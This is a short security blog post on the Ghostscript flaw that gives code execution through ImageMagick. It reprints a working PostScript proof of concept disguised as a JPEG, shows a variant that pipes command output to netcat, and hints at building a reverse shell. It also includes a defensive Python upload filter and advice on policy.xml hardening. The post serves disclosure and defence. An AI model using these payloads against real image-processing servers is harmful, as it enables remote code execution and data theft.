ImageMagick RCE

Overnight @taviso dropped a few vulnerabilities in GhostScript, including one that will cause code execution in ImageMagick.

Link to the bug report in Project Zero.

ImageMagick is not shy when it comes to the amount of vulnerabilities disclosed, with over 40 in 2018, and who can forget the marketing around ‘ImageTragick’?

The ImageMagick code execution caught my eye: ImageMagick is widely used on web servers, the bug seemed fairly trivial to exploit, and it showed the most promise of turning into a remote code execution.

The PoC provided by Tavis is fairly easy to break down; the final line is the part responsible for executing the code (Ubuntu PoC):

$ cat shellexec.jpeg
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

Running convert on the above file will execute the ‘id’ command, returning the id of the user that ran convert. ImageMagick identifies the format from the file's contents rather than its extension, so the %!PS header causes the file to be handed to the Ghostscript delegate, which interprets it.

$ convert shellexec.jpg blah.gif
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)

Quick and nasty testing showed that this could indeed be used to force a system to connect to another machine:

mark /OutputFile (%pipe%echo `id` | nc 127.0.0.1 1337) currentdevice putdeviceprops

becomes:

$ nc -lvvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from localhost 55068 received!
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)

Success! Command execution through to a ‘remote’ system. Modify payloads accordingly and you’ll have a ‘proper’ reverse shell ;)
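As a defensive check added here (not part of the original post or Tavis's PoC): an upload filter that classifies a file by its leading bytes, the way ImageMagick itself does, and rejects anything Ghostscript would interpret or whose extension lies about its type. The PoC above is embedded as constructed sample input; names such as `assess_upload` are my own.

```python
import re

# Magic bytes for formats ImageMagick delegates to Ghostscript.
GHOSTSCRIPT_MAGIC = (
    (b"%!PS", "postscript"),
    (b"%PDF", "pdf"),
    (b"\xc5\xd0\xd3\xc6", "eps"),  # DOS EPS binary header
)
# Raster formats that ImageMagick decodes without an external interpreter.
RASTER_MAGIC = (
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)
RASTER_EXT = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}
# Tokens the PoC uses to redirect Ghostscript output into a pipe.
SUSPICIOUS = re.compile(rb"%pipe%|/OutputFile|putdeviceprops|setpagedevice")

# The PoC from the post, embedded as constructed sample input.
POC = (b"%!PS\nuserdict /setpagedevice undef\nsave\nlegal\n"
       b"{ null restore } stopped { pop } if\n{ legal } stopped { pop } if\n"
       b"restore\nmark /OutputFile (%pipe%id) currentdevice putdeviceprops\n")

def sniff_format(data: bytes) -> str:
    """Classify by leading bytes only; the filename is never consulted."""
    head = data.lstrip()[:16]  # Ghostscript tolerates leading whitespace
    for magic, name in GHOSTSCRIPT_MAGIC + RASTER_MAGIC:
        if head.startswith(magic):
            return name
    return "unknown"

def assess_upload(filename: str, data: bytes) -> dict:
    """Reject anything Ghostscript would interpret or that lies about its type."""
    fmt = sniff_format(data)
    interpreted = fmt in {name for _, name in GHOSTSCRIPT_MAGIC}
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    mismatch = ext in RASTER_EXT and RASTER_EXT[ext] != fmt
    tokens = sorted({m.decode() for m in SUSPICIOUS.findall(data)})
    return {"format": fmt, "ghostscript": interpreted,
            "extension_mismatch": mismatch, "tokens": tokens,
            "reject": interpreted or mismatch}

if __name__ == "__main__":
    for name, blob in (("shellexec.jpeg", POC),
                       ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\0" * 16)):
        print(name, assess_upload(name, blob))
```

Magic-byte sniffing is a best-effort filter; in production it belongs alongside an ImageMagick policy.xml that denies the PS, EPS, PDF and XPS coders so the Ghostscript delegate is never reached for user-supplied files.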

Happy hacking.